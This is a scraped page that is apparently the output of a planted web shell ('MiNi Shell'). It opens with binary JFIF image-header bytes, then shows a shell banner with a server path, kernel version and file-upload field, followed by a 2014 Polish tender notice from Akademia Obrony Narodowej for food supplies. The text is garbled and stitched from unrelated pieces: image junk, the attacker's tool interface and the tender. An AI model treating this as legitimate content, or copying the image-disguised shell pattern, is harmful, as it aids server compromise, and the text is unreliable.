JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141127/390180-N-2014.html

<p class="kh_header"><b>Warszawa: DOSTAWA ROŻNYCH PRODUKTÓW SPOŻYWCZYCH</b><br>
<b>Numer ogłoszenia: 390180 - 2014; data zamieszczenia: 27.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Obrony Narodowej , al. Gen. A. Chruściela 103, 00-910 Warszawa, woj. mazowieckie, tel. 022 6813780, faks 022 6813175.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.aon.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ROŻNYCH PRODUKTÓW SPOŻYWCZYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Tuńczyk w sosie własnym - kawałki, op. 200-300 g	kg	300
Mąka ziemniaczana, op. 1 - 2 kg	kg	20
Kasza gryczana, op. 1 - 2 kg	kg	250
Kasza jęczmienna pęczak, op. 1 - 2 kg	kg	250
Kasza jęczmienna perłowa, op. 1 - 2 kg	kg	250
Cebulki konserwowe po oddzieleniu zalewy op. 0,5 - 1 kg	kg	40
Czosnek konserwowy po oddzieleniu zalewy op. 0,5 - 1 kg	kg	40
Marchewka z groszkiem i kukurydzą konserwowa po oddzieleniu zalewy op. 1,5 - 3 kg	kg	700
Marchewka z groszkiem konserwowa po oddzieleniu zalewy op. 1,5 - 3 kg	kg	700
Groszek konserwowy po oddzieleniu zalewy op. 1,5 - 3 kg	kg	1600
Seler konserwowy po oddzieleniu zalewy op. 0,5 - 1 kg	kg	800
Fasolka konserwowa po oddzieleniu zalewy op. 1,5 - 3 kg	kg	1600
Fasola czerwona konserwowa po oddzieleniu zalewy op. 1,5 - 3 kg	kg	350
Brzoskwinia konserwowa po oddzieleniu zalewy op. 0,3 - 0,8 kg	kg	1200
Ananas konserwowy po oddzieleniu zalewy op. 0,3 - 0,8 kg	kg	800
Sok (syrop) zagęszczony - koncentrat op. 0,5 - 1 l	l	100
Rodzynki	kg	40
Ryż op. 1-2 kg	kg	400
Płatki śniadaniowe czekoladowe op. 1 - 5 kg	kg	250
Pieczywo chrupkie (skład: mąka żytnia 50-60%, pełnoziarnista mąka pszenna 20-30%, mąka pszenna, odtłuszczone mleko w proszku, ekstrakt słodu jęczmiennego) opakowanie jednostkowe 100-150 g	kg	40
Cukier biały op. 1 - 2 kg	kg	3200
Cukier w kostkach op. 0,5 - 1 kg	kg	1000
Cukier porcjowany op. 2 -5 g	kg	20
Cukier puder op. 0,5 - 1 kg	kg	120
Cukier waniliowy op. 0,1 - 0,5 kg	kg	20
Makaron dwujajeczny 9nitki, paski, kolanka) op. 1 - 5 kg	kg	800
Ocet winny	l	20
Sos sałatkowy	kg	100
Przyprawa do flaków	kg	10
Papryka mielona	kg	20
Pieprz czarny mielony	kg	30
Sól spożywcza op. 1-5 kg	kg	2000
Barszcz biały	kg	150
Zupa pieczarkowa	kg	100
Drożdże piekarskie	kg	40
Proszek do pieczenia	kg	40
Miód pszczeli (naturalny) jednoporcjowy	kg	800
Łopatka konserwowa	kg	175
Szynka konserwowa	kg	175
Golonka konserwowa	kg	175
Pasztet z Indyka	kg	175
Fasola	kg	400
Groch	kg	400
Ogórki konserwowe 1250g po odcieku	kg	1500
Papryka konserwowa 0,900g po odcieku	kg	1000
Chrzan tarty	kg	400
Buraczki konserwowe	kg	200
Ćwikła z chrzanem	kg	200
Sałatka warzywna 5-składnikowa	kg	1000
Sałatka z czerwonej kapusty	kg	800
Sałatka szwedzka z ogórka	kg	700
Szczaw konserwowy	kg	200
Przecier ogórkowy	kg	300
Pieczarki konserwowe	kg	400
Kukurydza konserwowa	kg	1600
Koncentrat pomidorowy 30 %	kg	480
Sok jabłkowy 1 l	l	800
Nektar z czarnej porzeczki 1 l	l	800
Sok pomarańczowy 1 l	l	800
Sok wieloowocowy 1 l	l	800
Dżem  truskawkowy 20 - 30 g	kg	200
Dżem  truskawkowy	kg	400
Dżem  wiśniowy 20-30 g	kg	200
Dżem  wiśniowy	kg	400
Dżem morelowy 20-30 g	kg	200
Dżem  jagodowy 20-30 g	kg	200
Powidła śliwkowe 20-30 g	kg	230
Jabłka suszone	kg	20
Śliwki suszone	kg	40
Olej jadalny rzepakowy	l	400
Olej jadalny słonecznikowy	l	1600
Margaryny	kg	600
Mąka pszenna  Szymanowska typ 480	kg	2500
Kasza manna	kg	250
Płatki owsiane	kg	250
Płatki kukurydziane	kg	250
Musli jabłkowe	kg	250
Musli truskawkowe	kg	250
Musli morelowe	kg	250
Krakersy	kg	50
Paluszki solone	kg	150
Cukierki witaminizowane 100g różne smaki	kg	80
Kakao 10-12% tł.	kg	300
Herbata czarna granulowana	kg	150
Herbata czarna liściasta	kg	150
Herbata w torebkach (ekspresowa)	kg	20
Przyprawa do zup w płynie	l	400
Ocet	l	400
Ketchup 4,5-5,5kg	kg	800
Musztarda 4,5-5,5kg	kg	800
Przyprawa do mięsa	kg	100
Przyprawa do ryb	kg	50
Przyprawa do drobiu	kg	80
Przyprawa uniwersalna	kg	80
Majonez 0,3-2 kg	kg	800
Cynamon	kg	20
Bazylia suszona	kg	20
Oregano suszone	kg	20
Liść laurowy	kg	10
Majeranek	kg	10
Ziele angielskie	kg	10
Kwasek cytrynowy	kg	20
Bulion drobiowy	kg	40
Żelatyna spożywcza	kg	20
Woda pitna but. gazowana 1,5 l	l	7000
Woda pitna but. niegazowana 1,5 l	l	7000
Babeczki korpusy kruche 200g (24szt)
	kg	15
Borówka konserwowa do mięsa 260g
	kg	20
Czosnek mielony 50g
	kg	40
Galaretka owocowa (różne smaki) 75g
	kg	30
Gałka muszkatołowa mielona 10g
	kg	10
Gruszki konserwowe 820g
	kg	50
Mąka kukurydziana
	kg	20
Morele suszone 200g
	kg	30
Kapary w zalewie 100g
	kg	30
Kotlety sojowe
	kg	10
Majonez dekoracyjny 400g
	kg	100
Migdały płatki 100g
	kg	20
Oliwki  zielone w zalewie 750g drylowane
	kg	100
Oliwki  czarne w zalewie 750g drylowane
	kg	20
Orzechy włoskie łuskane 500g
	kg	20
Pieprz biały 250g
	kg	10
Pomidory suszone w zalewie 850g
	kg	10
Topping czekoladowy 200g
	kg	10
Topping owocowy 200g
		30
Szparagi konserwowe 212g
	kg	40
Sos tabasco 150g
	kg	10
Śmietana śnieżka w proszku saszetki 60g
	kg	15
Żurawina konserwowa do mięsa 300g
	kg	60
Jabłka prażone kostka 900g
	kg	100
Groszek ptysiowy 80g
	kg	30
Sos sojowy 150g
	kg	30
Budyń (waniliowy, śmietankowy) 60g
	kg	130
Kisiel (cytrynowy, jabłkowy) 77g
	kg	15
Rosół drobiowy kostka 180g (18szt)
	kg	100
Pomidory koktajlowe w zalewie 400g
	kg	50
Koncentrat barszczu czerwonego 320g
	kg	40
Ziarno sezamu 300g
	kg	5
Zupa krem borowikowy 1,3 kg
	kg	80
Zupa krem szparagowy 1,05 kg
	kg	40
Sos pieczeniowy ciemny 30g
	kg	40
Sos zielony pieprz 30g
	kg	40
Grzanki ziołowo czosnkowe
	kg	100
Borowiki suszone kl.1, 500g
	kg	20
Podgrzybki suszone kl.1 500g
	kg	10
Ciastka Delicje różne smaki 147g
	kg	100
Ciastka Pieguski różne smaki 135g
	kg	100
Ciastka Markizy różne smaki 250g
	kg	100
Ciastka Jerzyki różne smaki 140g
	kg	100
Ciastka pierniki 160g
 	kg	100
Cukierki czekoladowe mieszanka Wedlowska różne smaki 2,5kg
	kg	150
Chipsy Lays różne smaki 70g
	kg	200
Chipsy Lays różne smaki 150g
	kg	200
Czekolada Alpen Gold mleczna nadziewana różne smaki 100g
	kg	800
Czekolada Alpen Gold Nussbeisser mleczna z orzechami 100g
	kg	200
Czekolada Alpen Gold mleczna  100g
	kg	700
Czekolada Alpen Gold goszka 100g
	kg	400
Czekolada Alpen Gold Bakaliowa 100g
	kg	400
Herbata Lipton Yellow Label 100 torebek
	kg	100
Herbata owocowa w saszetce ze sznurkiem i etykietą 100 torebek	kg	50
Guma do żucia Orbit 10 drażetkek różne smaki
	kg	60
Kawa rozpuszczalna Jacobs Cranat Gold 200g
	kg	100
Kawa rozpuszczalna Nescafe Gold 200g
	kg	100
Kawa rozpuszczalna Maxwell House 200g
	kg	100
Cukierki Tik Tak 16g różne smaki
	kg	50
Baton Prince polo 52g różne smaki
	kg	70
Baton Pawełek 45g różne smaki
	kg	120
Baton Twix 51g różne smaki
	kg	70
Baton Kit Kat 40g różne smaki
	kg	70
Baton Bajeczny 45g różne smaki
	kg	70
Baton Bounty 57g
	kg	70
Baton Grześki 39g różne smaki
	kg	120
Baton Mars 42g
	kg	70
Baton Snickers 51g
	kg	70
Baton Lion 43g
	kg	70
Baton WW 47g różne smak
	kg	70.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.24.14.00-3, 15.31.20.00-8, 15.33.11.30-7, 15.33.00.00-0, 15.61.00.00-7, 15.83.12.00-4, 15.85.11.00-9, 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W celu zabezpieczenia podpisania umowy przez wykonawców, każda oferta musi być zabezpieczona wadium w wysokości 10000,00 zł (słownie: dziesięć tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten będzie spełniony przez Wykonawcę, który posiada:
-aktualną decyzję administracyjną wydaną przez właściwy organ Państwowej Inspekcji Sanitarnej lub Weterynaryjnej o spełnianiu wymagań koniecznych do zapewnienia higieny w procesie produkcji lub w obrocie oraz do zapewnienia właściwej jakości zdrowotnej tych artykułów zgodnie z ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz.U. Nr 136, poz. 914 z późn. zm.)  oraz ustawą z dnia 16 grudnia 2005 o produktach pochodzenia zwierzęcego (Dz. U. z 2006r. Nr 17 poz. 127 z poź. zm.) 

lub 

-zaświadczenie o wpisie do rejestru zakładów podlegających urzędowej kontroli organów Państwowej Powiatowej Inspekcji Sanitarnej - zgodnie z art. 61 i art. 62 ust. 1 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności  i żywienia (Dz. U. z 2010 r. Nr l36 poz. 914 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składający ofertę musi wykazać że wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych dostaw,  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, jedną dostawę zawierającą w swym przedmiocie dostawę różnych produktów spożywczych, przy czym wartość tej dostawy była nie mniejsza niż 300.000,00 zł brutto, z podaniem jej wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawa ta została wykonana, oraz załączy dowody, że dostawa została wykonana lub jest wykonywana należycie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W zakresie potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje; - aktualna decyzja administracyjna wydana przez właściwy organ Państwowej Inspekcji Sanitarnej lub Weterynaryjnej o spełnianiu wymagań koniecznych do zapewnienia higieny w procesie produkcji lub w obrocie oraz do zapewnienia właściwej jakości zdrowotnej tych artykułów zgodnie z ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz.U. Nr 136, poz. 914 z późn. zm.) oraz ustawą z dnia 16 grudnia 2005 o produktach pochodzenia zwierzęcego (Dz. U. z 2006r. Nr 17 poz. 127 z poź. zm.) lub - zaświadczenie o wpisie do rejestru zakładów podlegających urzędowej kontroli organów Państwowej Powiatowej Inspekcji Sanitarnej - zgodnie z art. 61 i art. 62 ust. 1 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2010 r. Nr l36 poz. 914 z późn. zm.). W zakresie dokumentów jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnianie przez oferowane dostawy wymagań określonych przez Zamawiającego: - aktualny certyfikat wydany przez firmy posiadające akredytację i uprawnienia Polskiego Centrum Akredytacji z siedzibą w Warszawie oraz krajowej organizacji akredytacyjnej dla danego kraju lub aktualne zaświadczenie wydane przez właściwego terytorialnie Powiatowego Inspektora Państwowej Inspekcji Sanitarnej lub aktualny protokół z kontroli sanitarnej właściwego organu urzędowej kontroli wystawiony nie wcześniej niż 1 rok przed upływem terminu składania ofert, potwierdzającego stosowanie systemu HACCP</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Gwarancja niezmienności cen w okresie obowiązywania umowy - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza indeksację wynagrodzenia należnego Wykonawcy w przypadku wystąpienia nadzwyczajnych okoliczności tj. wysoka inflacja, poważne zakłócenia na rynku zaopatrzeniowym, załamanie wzrostu gospodarczego, klęska żywiołowa itd. lub jeżeli wskaźnik wzrostu cen towarów dla poszczególnych grup produktów, opublikowany przez Główny Urząd Statystyczny w publikacji branżowej -Ceny, handel, usługi - wskaźnik zmiany cen żywności i napojów bezalkoholowych o tytule -Ceny w gospodarce narodowej- miesięczne, ulegnie zmianie o 5 % w stosunku do cen obowiązujących w umowie.
Zapis dla Wykonawców, którzy niezaoferują gwarancji niezmienności cen.
2. Zamawiający nie dopuszcza indeksacji wynagrodzenia należnego Wykonawcy w okresie obowiązywania umowy  od.  do. W przypadku zaoferowania przez Wykonawcę gwarancji niezmienności cen w trakcie obowiązywania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.aon.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Adres jak na wstępie, budynek nr 4 pokój nr 129. Koszt siwz - 7,40 zł. i koszty przesyłki. Siwz pobrana ze strony internetowej Zamawiającego jest bezpłatna..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2014 godzina 10:30, miejsce: Oferty należy składać w siedzibie Zamawiającego, adres jak na wstępie w Kancelarii Jawnej AON - budynek nr 101 pokój 210a (II piętro)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com